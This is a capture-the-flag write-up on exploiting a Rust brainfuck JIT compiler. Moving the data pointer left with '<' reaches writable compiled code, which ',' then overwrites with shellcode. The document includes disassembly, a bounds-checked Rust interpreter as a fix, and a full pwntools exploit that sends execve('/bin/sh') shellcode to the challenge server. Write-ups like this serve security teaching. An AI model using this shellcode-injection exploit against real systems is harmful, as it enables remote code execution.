Tags: pwn brainfuck
Rating: 5.0
You are given a Just-In-Time compiler written in Rust that executes brainfuck code.
A teammate found out that by moving the data pointer to the left with "**<**" you can reach a function which looked like this:
```
sub rsp, 0x28
mov qword [rsp + 0x30], rcx
mov qword [rsp + 0x40], r8
mov qword [rsp + 0x48], r9
sub rsi, 0x68
cmp rsi, rdx
jae 0x38
add rsi, 0x8000
mov qword [rsp + 0x30], rdi
mov qword [rsp + 0x38], rsi
mov qword [rsp + 0x40], rdx
mov qword [rsp + 0x48], rcx
movabs rax, 0x56321e001b50
call rax
mov rdi, qword [rsp + 0x30]
mov rsi, qword [rsp + 0x38]
mov rdx, qword [rsp + 0x40]
mov rcx, qword [rsp + 0x48]
cmp al, 0
jne 0x80
mov rax, 0
add rsp, 0x28
ret
mov rax, 1
add rsp, 0x28
ret
```
The function can be overwritten with shellcode by reading input with "**,**", which is the equivalent of getchar() in C.
I do not overwrite the `call` instruction, because otherwise the shellcode would not be executed.
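The root cause is that "**<**" lets the data pointer leave the tape and land on writable JIT memory, so "**,**" writes attacker-chosen bytes into code. As an added example (not the challenge's code or its author's), here is a brainfuck interpreter in Rust, rather than a JIT, where every pointer move is checked against the tape and fails closed; the tape size, error type and function names are my own choices:

```rust
// Added example, not the challenge's JIT: a brainfuck interpreter whose
// data pointer can never leave the tape. In the writeup, "<" walked the
// pointer off the tape into adjacent JIT memory and "," then wrote
// attacker-chosen bytes there; here each move is checked and fails closed.

#[derive(Debug, PartialEq)]
pub enum BfError { Underflow(usize), Overflow(usize), Bracket(usize) }

/// Pair every '[' with its ']' up front so loops cost one lookup.
fn jump_table(prog: &[u8]) -> Result<Vec<usize>, BfError> {
    let (mut table, mut stack) = (vec![0usize; prog.len()], Vec::new());
    for (i, &b) in prog.iter().enumerate() {
        if b == b'[' { stack.push(i); }
        if b == b']' {
            let open = stack.pop().ok_or(BfError::Bracket(i))?;
            table[open] = i;
            table[i] = open;
        }
    }
    stack.pop().map_or(Ok(table), |i| Err(BfError::Bracket(i)))
}

/// Run `prog` on a zeroed tape of `cells` bytes, reading ',' from `input`.
/// Returns (tape, output) or the program offset of the first bad move.
pub fn run(prog: &[u8], cells: usize, input: &[u8]) -> Result<(Vec<u8>, Vec<u8>), BfError> {
    let jumps = jump_table(prog)?;
    let (mut tape, mut out, mut ptr, mut pc) = (vec![0u8; cells], Vec::new(), 0usize, 0usize);
    let mut inp = input.iter();
    while pc < prog.len() {
        match prog[pc] {
            // The two moves are the whole fix: refuse to step outside the tape.
            b'<' => ptr = ptr.checked_sub(1).ok_or(BfError::Underflow(pc))?,
            b'>' => ptr = if ptr + 1 < cells { ptr + 1 } else { return Err(BfError::Overflow(pc)) },
            b'+' => tape[ptr] = tape[ptr].wrapping_add(1),
            b'-' => tape[ptr] = tape[ptr].wrapping_sub(1),
            b'.' => out.push(tape[ptr]),
            b',' => tape[ptr] = inp.next().copied().unwrap_or(0), // EOF reads as 0
            b'[' if tape[ptr] == 0 => pc = jumps[pc],
            b']' if tape[ptr] != 0 => pc = jumps[pc],
            _ => {} // any other byte is a comment
        }
        pc += 1;
    }
    Ok((tape, out))
}

fn main() {
    // Constructed input: the writeup's first payload byte, '<' at cell 0.
    println!("{:?}", run(b"<", 16, b""));
}
```

With this check the writeup's payload fails on its very first "<" instead of reaching the compiled function.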
Full Exploit:
```
from pwn import *

context.bits = 64
context.arch = "amd64"

p = remote("challenges.tamuctf.com", 31337)

# execve("/bin/sh") shellcode from pwntools' shellcraft
shellcode = asm(shellcraft.amd64.linux.sh())

# Walk the data pointer 23 cells to the left, onto the JIT'd function,
# then read one byte per shellcode byte (",") and advance (">").
pay = b"<" * 23
for _ in range(len(shellcode)):
    pay += b",>"
print(pay)

p.recvuntil(b"$")
p.sendline(pay)        # the brainfuck program
p.sendline(shellcode)  # the bytes that "," will read
p.interactive()
```